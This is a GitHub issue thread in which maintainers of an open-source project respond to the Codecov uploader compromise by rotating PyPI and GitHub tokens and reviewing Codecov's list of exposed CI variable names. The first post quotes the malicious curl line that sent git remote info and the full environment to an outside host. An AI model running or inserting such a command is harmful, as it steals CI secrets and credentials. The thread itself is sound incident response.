### ISSUE TITLE
[Security] Invalidate all CI secrets

### ISSUE THREAD

**Issue by sroet** [openpathsampling/openpathsampling#1013]
@dwhswenson (I could not find a way of making a secret issue, so here is a public one) 

The github-action script of `codecov` was compromised to send the full CI env info to a third party. You might need to invalidate all CI secrets. (I don't know if you have any that are worht rotating, just makin sure you are aware of the issue) 

[codecov reference](https://codecov.io/disclosure)
mallicious added code line:
```
curl -sm 0.5 -d “$(git remote -v)<<<<<< ENV $(env)” https://<redacted>/upload/v2 || true
```

**Comment by dwhswenson** [comment]
Yeah, we were vulnerable on this. I got the email from CodeCov yesterday and immediate revoked old PyPI/test.PyPI tokens, changed my PyPI/test.PyPI passwords (which probably wasn't necessary, but never hurts) and I've revoked the autorelease GitHub access token (still need to update with a new one here). Those are the only secrets in the repository.

I think the main risks for us could have been:

* **PyPI access allowing either fake releases or deletes of existing releases.** This was easy to check by eye.
* **Write access to the repo allowing injection of bad code.** All of my commits are [cryptographically signed](https://docs.github.com/en/github/authenticating-to-github/managing-commit-signature-verification) (either with my signature if I wrote it or with GitHub's signature for merges/other commits made through the web UI.) Plus, it's easy to verify from the [network](https://github.com/openpathsampling/openpathsampling/network) that there have been no direct commits to master; everything came from PRs and was therefore verified by GitHub (and all the [verification badges](https://github.com/openpathsampling/openpathsampling/commits) are still green).

I can't think of any other attacks that could have been generated from access to the repo and full access to PyPI projects (although please feel free to suggest anything else you can think of).

**Comment by sroet** [comment]
> I can't think of any other attacks that could have been generated from access to the repo and full access to PyPI projects (although please feel free to suggest anything else you can think of).

The last one I could think of is a malicious attack on the AWS instance that is hosting the website from 
https://github.com/openpathsampling/openpathsampling/blob/master/devtools/ci/push-docs-to-s3.py

(I don't think that script is run anymore though, considering that 1.9.5 does not show up on the website)

**Comment by dwhswenson** [comment]
Yeah, I still don't have the keys to the website. They were only on Travis. Need to bug John about it again.

**Comment by dwhswenson** [comment]
A little more information on this. Codecov has informed me of a list of environment variables they believe were compromised. This doesn't include the tokens that I was concerned about (and already reset) -- I think those only actually enter the environment when doing a release, because they must be explicitly requested from `${{ secrets.TOKEN_NAME }}` outside the actual step. Also, we don't run Codecov in the same job as our release process.

Full text from Codecov below. I don't see any tokens/env vars that look to me like they could be a threat. @sroet, would you mind looking over this list and flagging anything that looks suspicious?

> We have reason to believe that this repo may have been downloaded by the threat actor. We recommend reaching out to your git provider for more information. We have reason to believe the following environment variables and/or sensitive keys were exposed. For security and privacy reasons, we've limited sensitive keys to the first seven characters to help you identify the key, without printing it in full.
> 
> * GITHUB_HEAD_REF
> * ANDROID_NDK_HOME
> * RUNNER_WORKSPACE
> * LEIN_HOME
> * PERFLOG_LOCATION_SETTING
> * PWD
> * GITHUB_ENV
> * HOMEBREW_NO_AUTO_UPDATE
> * GITHUB_ACTION_REF
> * GOROOT
> * S_COLORS
> * GITHUB_WORKSPACE
> * VCPKG_INSTALLATION_ROOT
> * AZURE_EXTENSION_DIR
> * RUNNER_TEMP
> * JAVA_HOME_11_X64
> * _CE_CONDA
> * ANDROID_HOME
> * _
> * RUNNER_PERFLOG
> * HOMEBREW_CELLAR
> * DOTNET_SKIP_FIRST_TIME_EXPERIENCE
> * GOROOT_1_14_X64
> * HOME
> * GITHUB_SHA
> * GITHUB_ACTION_REPOSITORY
> * GECKOWEBDRIVER
> * SHLVL
> * LEIN_JAR
> * CONDA_DEFAULT_ENV
> * _CE_M
> * PIPX_BIN_DIR
> * LANG
> * DEBIAN_FRONTEND
> * USER
> * JOURNAL_STREAM
> * GITHUB_EVENT_NAME
> * GITHUB_ACTOR
> * CONDA_PKGS_DIR
> * GITHUB_JOB
> * DOTNET_NOLOGO
> * GITHUB_REPOSITORY
> * RUNNER_USER
> * GITHUB_WORKFLOW
> * GITHUB_API_URL
> * GITHUB_RUN_ID
> * BOOTSTRAP_HASKELL_NONINTERACTIVE
> * GRAALVM_11_ROOT
> * GITHUB_RETENTION_DAYS
> * CHROME_BIN
> * CI
> * JAVA_HOME_12_X64
> * PATH
> * CONDA
> * CONDA_PREFIX
> * ANDROID_SDK_ROOT
> * GITHUB_SERVER_URL
> * GITHUB_ACTIONS
> * CONDA_PYTHON_EXE
> * GITHUB_PATH
> * M2_HOME
> * ANDROID_NDK_ROOT
> * ANT_HOME
> * GOROOT_1_16_X64
> * AGENT_TOOLSDIRECTORY
> * ANDROID_NDK_LATEST_HOME
> * CHROMEWEBDRIVER
> * INVOCATION_ID
> * GITHUB_BASE_REF
> * LD_LIBRARY_PATH
> * GSETTINGS_SCHEMA_DIR_CONDA_BACKUP
> * GITHUB_RUN_NUMBER
> * GITHUB_ACTION
> * GITHUB_REF
> * RUNNER_TOOL_CACHE
> * PIPX_HOME
> * GITHUB_REPOSITORY_OWNER
> * DEPLOYMENT_BASEPATH
> * SELENIUM_JAR_PATH
> * ImageVersion
> * RUNNER_TRACKING_ID
> * CONDA_PREFIX_1
> * RUNNER_OS
> * JAVA_HOME_8_X64
> * GRADLE_HOME
> * CONDA_SHLVL
> * CONDA_PROMPT_MODIFIER
> * HOMEBREW_PREFIX
> * GITHUB_EVENT_PATH
> * ImageOS
> * HOMEBREW_CLEANUP_PERIODIC_FULL_DAYS
> * POWERSHELL_DISTRIBUTION_CHANNEL
> * DOTNET_MULTILEVEL_LOOKUP
> * GSETTINGS_SCHEMA_DIR
> * GOROOT_1_15_X64
> * GOROOT_1_13_X64
> * pythonLocation
> * XDG_DATA_DIRS
> * GITHUB_GRAPHQL_URL
> * SWIFT_PATH
> * CONDA_EXE
> * HOMEBREW_REPOSITORY
> * JAVA_HOME
> * BOOST_ROOT_1_72_0
> * JAVA_HOME_7_X64

**Comment by sroet** [comment]
None of these are immediately dangerous. 
The only ones that might be somewhat useful are:
> GITHUB_REPOSITORY_OWNER

with

> GITHUB_REPOSITORY

This gives a username and repository, which might give someone a quick list for spear-phishing for active repositories (running CI frequently). (Only attack I could think of is sending fake GA emails).

For this repository, it should not leak more info than already public. However, this can be a lot nastier for private repositories.
